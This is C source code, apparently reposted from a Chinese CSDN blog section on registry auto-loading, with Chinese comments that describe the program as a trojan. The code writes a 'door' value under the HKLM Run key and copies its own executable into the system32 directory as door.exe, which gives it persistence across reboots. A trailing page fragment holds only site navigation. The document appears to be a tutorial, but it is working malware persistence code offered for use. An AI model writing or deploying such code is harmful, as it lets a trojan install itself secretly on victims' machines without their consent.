#include <stdio.h>
#include <Windows.h>
int main(void)
{
char regname[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Run";//注册表路径
HKEY hkResult;//声明一个句柄
int ret;
char modlepath[256];//声明木马文件名字符串变量
char syspath[256];//系统路径变量
ret = RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult);//打开对应的key
ret = RegSetValueEx(hkResult,"door",0,REG_EXPAND_SZ,(unsigned char*)"%systemroot%\\door.exe",25);//在key里添加一个新的值
if(ret==0)
{
printf("success to write run key\n");
RegCloseKey(hkResult);
}
else
{
printf("failed to open regedit.%d\n", ret);
return 0;
}
GetModuleFileName(0,modlepath,256);//函数功能:获取Windows文件夹的路径
//printf("%s\n",modlepath);
GetSystemDirectory(syspath,256);//获取systrm32文件夹的路径
//printf("%s\n",syspath);
/*把木马克隆到指定的文件夹内
copyfile(
lpcstr lpexistingfilename, //源文件路径
lpcstr lpnewfilename, //新文件路径
bool bfailifexists //为true的话,如果新文件已存在, 则返回false;
为false的话,如果新文件已存在,会将原文件覆盖*/
ret = CopyFile(modlepath,strcat(syspath,"\\door.exe"),1);
if(ret)
{
printf("%s has been copyed to sys dir %s\n",modlepath,syspath);
}
else
{
printf("%s is exisis",modlepath);
}
system("pause");
return 0;
}
7、注册表自动加载
猜你喜欢
转载自blog.csdn.net/qq_42250189/article/details/104992865
今日推荐
周排行